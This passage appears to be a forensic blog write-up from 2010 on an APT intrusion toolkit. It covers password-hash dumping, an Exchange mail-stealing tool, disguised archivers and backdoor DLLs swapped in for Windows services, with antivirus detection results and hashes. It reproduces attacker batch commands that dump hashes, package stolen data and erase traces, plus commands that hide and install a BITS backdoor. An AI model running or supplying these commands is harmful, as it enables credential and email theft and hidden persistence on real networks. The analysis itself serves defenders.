If your attackers are sloppy or if you run data recovery/unerase/unformat tools on the affected machine, you may find other tools and files associated with this type of attack.

2. DumpExt.dll, DumpSvc.exe, PWDumpX.exe
 PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.
I don't think these files require much analysis, they are part of a well known password stealing application and the results are needed for pass-the-hash exercises described above

3. m.exe

Update: July 16, 2010. 
You may see MAPI.EXE as a variant, which does the same thing (see download link in the beginning of this post)
VT 0/42 
File size: 227840 bytes
MD5   : c57902ace7ff4173ae41f1292ea85e2a

m.exe is a file you may find together with the files listed. This file might be a standalone creation or a derivative of getmail (many thanks to JM for the tip). See the strings below for comparison.

Once user credentials are changed using the psh toolkit described above (wiam.exe+iam.dll), m.exe cli tool can be used to retrieve email messages of the target from an Exchange server. The usage is the following:

Example:%s -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

One needs to specify user name, server name, date range and location where to save the stolen data.

The email messages will be converted to text and attachments saved in corresponding subfolders. See examples below.

The message formatting will look like this:

From:Jon Doe
To:Jane Smith
Subject:RE: Meeting
Recv Time:08/05/2009 08:27 PM

Hi Jane,

Thanks so much but I will not be able to attend the meeting. 


From: Jane Smith []
Sent: Tuesday, August 04, 2009 10:43 AM
To: Jon Doe
Subject: Meeting

Jon, can you join us for the meeting tomorrow?

Until very recently it was 0/41 on VT but now it is 1/41
  File m.exe received on 2010.06.07 18:11:03 (UTC)
Result: 1/41 (2.44%)
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Backdoor.H
Additional information
File size: 215552 bytes
MD5...: 09e25bb934d8523fccd27b86fbf4f8ce

m.exe strings

getmail.exe strings

 4.r.exe or ntfre.exe or any name
The tools get uploaded as an archive (archive be disguised as a temp file like ~WRD0204.tmp) and the stolen data needs to be compressed before it gets taken out, so there can be any kind of archiver involved These are two examples - same kind of cli WinRAR, just different names
(C) 1993-%d Alexander Roshal
Usage:     rar - -
Usage:     unrar - -

  a             Add files to archive
 File ntfre.exe received on 2010.06.07 18:28:41 (UTC)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 1/41 (2.44%)
eSafe    2010.06.06    Win32.Banker  - not really but they use these in banks too, I am sure (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274
r.exe is the same MD5 c7e858e4a51ba7d26af9235064988274

5. Batch files to automate the process.
There can be any variety of batch files, their content depends how much typing they don't want to do. Here is an example of a password hash stealing process
Here is an example for pp.bat
cd C:\windows\ime\imejp
ntfre e -p64740629 ~WRD0203.tmp (uncompress ~WRD0203.tmp archive using password 64740629)
del ~WRD0203.tmp (delete the archive)
PWDumpX.exe + +  (dump password hash)
del DumpExt.dll
del DumpSvc.exe
del PWDumpX.exe
ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday  C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
del ntfre.exe
net use \\\ipc$ /del
del pp.bat

 ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
  means the following:
-r - add files to archive with all subdirectories  
-m3 - set compression method 3 , which is default (5 is max)
-inul - means suppress messages
ep1  -- means exclude bvase dir name from names
 n* - Uhm, something about specified files not sure
-hphappyday  - set this as archive password 

 6. Backdoor services and files for their installation.
- there are MANY types of services that get modified to serve as backdoors by replacing the legitimate library. I posted a few recent examples before  and  and I will post more  but now I will give one example.


some strings
cmd /c attrib +h +s qmqrprxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 qmqrprxy.dll,RundllInstall
cmd /c del.bat
del %s
del %s /as
ping -n 3
Update July 16, 2010 
Here is a nice recent example for a backdoor service (legitimate library file for a non-essential service gets replaced with a malicious file)

"DisplayName"="Authentication Service"
"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"

replaced with ias.dll
File iass.dll received on 2010.07.05 04:11:40 (UTC)
Result: 18/41 (43.90%)
a-squared 2010.07.05 Packer.RLPack!IK
AntiVir 2010.07.04 TR/Crypt.XPACK.Gen
Authentium 2010.07.04 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 2010.07.04 BackDoor.Generic12.BLMD
BitDefender 7.2 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Comodo 5321 2010.07.05 Heur.Pck.RLPack
F-Prot 2010.07.04 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
GData 21 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Ikarus T3. 2010.07.05 Packer.RLPack
McAfee-GW-Edition 2010.1 2010.07.04 Heuristic.LooksLike.Win32.Suspicious.C
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
nProtect 2010-07-04.02 2010.07.04 Gen:Packer.RLPack.D.ai5aaiqnctm
Panda 2010.07.04 Suspicious file
Sophos 4.54.0 2010.07.05 Sus/Encpk-MV
TrendMicro 2010.07.05 PAK_Generic.001
Additional information
File size: 16048 bytes
MD5   : 426f6471b612cf7bb32130fee94cf4c3

Other example of a backdoor file, which does not run as a service. It runs as a separate process and  with the same name ccapp.exe, which is a name of Symantec/Norton Antivirus’ real-time scanner.  
ccapp.exe  19/41 FFA85CB60C3572198A520B866FAE8B15
 File ccapp.exe received on 2010.07.05 04:26:40 (UTC)
Result: 19/41 (46.34%)
AhnLab-V3     2010.07.03.00     2010.07.03     Win32/MalPackedB.suspicious
AntiVir     2010.07.04     TR/Crypt.ZPACK.Gen
Authentium     2010.07.04     W32/Fujack.U
Avast     4.8.1351.0     2010.07.04     Win32:Malware-gen
Avast5     5.0.332.0     2010.07.04     Win32:Malware-gen
AVG     2010.07.04     Win32/Virut.Z
BitDefender     7.2     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo     5321     2010.07.05     TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot     2010.07.04     W32/Fujack.U
F-Secure     9.0.15370.0     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData     21     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft     1.5902     2010.07.03     Backdoor:Win32/Pingbed.A
Norman     6.05.10     2010.07.04     Fujack.T
nProtect     2010-07-04.02     2010.07.04     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda     2010.07.04     Suspicious file
Sunbelt     6544     2010.07.05     Trojan.Crypt.AntiSig.b (v)
Symantec     20101.1.0.89     2010.07.05     Suspicious.MH690.A
ViRobot     2010.7.3.3920     2010.07.04     Backdoor.Win32.IRCBot.35288
VirusBuster     2010.07.04     Packed/RLPack
Additional information
File size: 14257 bytes
MD5   : ffa85cb60c3572198a520b866fae8b15
 ------------------------ end of July 16, 2010 update-------------------------

qmqr.dll or qmqrprxy.dll

C:\WINDOWS\system32\qmqrprxy.dll (32768 Bytes.) - qmqrprxy.dll to replace legitimate BITs service file qmgr.dll - in 

Command sequence:
C:\del.bat (56 Bytes.)
cmd /c rundll32 qmqrprxy.dll,RundllInstall
restarts BITS
cmd /c net stop bits

cmd /c net start bits 

sets attribute to system hidden
cmd /c attrib +h +s qmqrprxy.dll
cmd /c del.bat    - deletes the batch file

BITS firewall bypass - backdoor - see explanation here New Attack Piggybacks on Microsoft's Patch Service or here  Обход фаеров с использованием BITS 

TCP traffic
ISP:    ChinaNet Shanghai Province Network
Organization:    ChinaNet Shanghai Province Network
Country:    China
State/Region:    Shanghai
 File qmqrprxy.dll received on 2010.06.07 20:28:13 (UTC)  - originally was 2/41 on VT
Result: 25/41 (60.98%)
a-squared    2010.06.07    Trojan-Downloader.Win32.Small!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Win-Trojan/Atraps.32768.N
AntiVir    2010.06.07    TR/ATRAPS.Gen
Avast    4.8.1351.0    2010.06.07    Win32:Malware-gen
Avast5    5.0.332.0    2010.06.07    Win32:Malware-gen
AVG    2010.06.07    BackDoor.Generic12.KBM
BitDefender    7.2    2010.06.07    Trojan.Generic.2664831
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5020    2010.06.07    TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure    9.0.15370.0    2010.06.07    Trojan.Generic.2664831
GData    21    2010.06.07    Trojan.Generic.2664831
Ikarus    T3.    2010.06.07    Trojan-Downloader.Win32.Small
Kaspersky    2010.06.07    Backdoor.Win32.Small.iog
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Downloader.H
Microsoft    1.5802    2010.06.07    TrojanDownloader:Win32/Troxen!rts
NOD32    5180    2010.06.07    a variant of Win32/Agent.WQS
Norman    6.04.12    2010.06.07    W32/Atraps.EZM
nProtect    2010-06-07.01    2010.06.07    Trojan.Generic.2664831
Panda    2010.06.07    Trj/CI.A
PCTools    2010.06.07    Trojan.ADH
Prevx    3.0    2010.06.07    High Risk Worm
Sunbelt    6416    2010.06.07    Trojan.Win32.Small
Symantec    20101.1.0.89    2010.06.07    Trojan.ADH
TrendMicro    2010.06.07    BKDR_SMALL.LOP
TrendMicro-HouseCall    2010.06.07    BKDR_SMALL.LOP
Additional information
File size: 32768 bytes
MD5...: 03b3cceb253fd782590cf0efafd49d5f

There can be a few other files as well, this is a basic pack that is needed to pull it off. I will be adding more files related to this type of attack and other APT malware but feel free to email me if you have questions or comments.